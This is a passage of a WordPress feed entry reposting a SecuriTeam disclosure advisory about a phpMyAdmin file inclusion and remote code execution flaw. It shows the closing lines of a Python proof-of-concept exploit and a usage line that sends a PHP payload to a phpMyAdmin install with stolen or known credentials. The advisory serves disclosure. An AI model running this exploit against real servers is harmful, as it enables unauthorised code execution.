class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-P&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;php-payload&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse_args<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">url<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-98\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php_payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0090 seconds] -->  <\/p>\n<p><b>How to use<\/b><br \/> python poc.py -u &lt;username&gt; -p &lt;password&gt; -U http:\/\/&lt;domain or ip&gt;\/phpmyadmin &#8211;php-payload=&#8221;phpcredits();&#8221;<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3700\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 02 Jul 2018 12:19:53 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary Authenticated users can exploit a file inclusion vulnerability in phpMyAdmin which can then be combined with another vulnerability, to perform Remote Code Execution. In addition, authnticated attackers can view files and execute PHP files that located on the server by exploiting a bug in the part of the code that is responsible for &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3700\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 phpMyAdmin File Inclusion and Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[14428,11682,10757],"class_list":["post-12725","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-local-file-inclusion","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12725"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12725\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12725"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}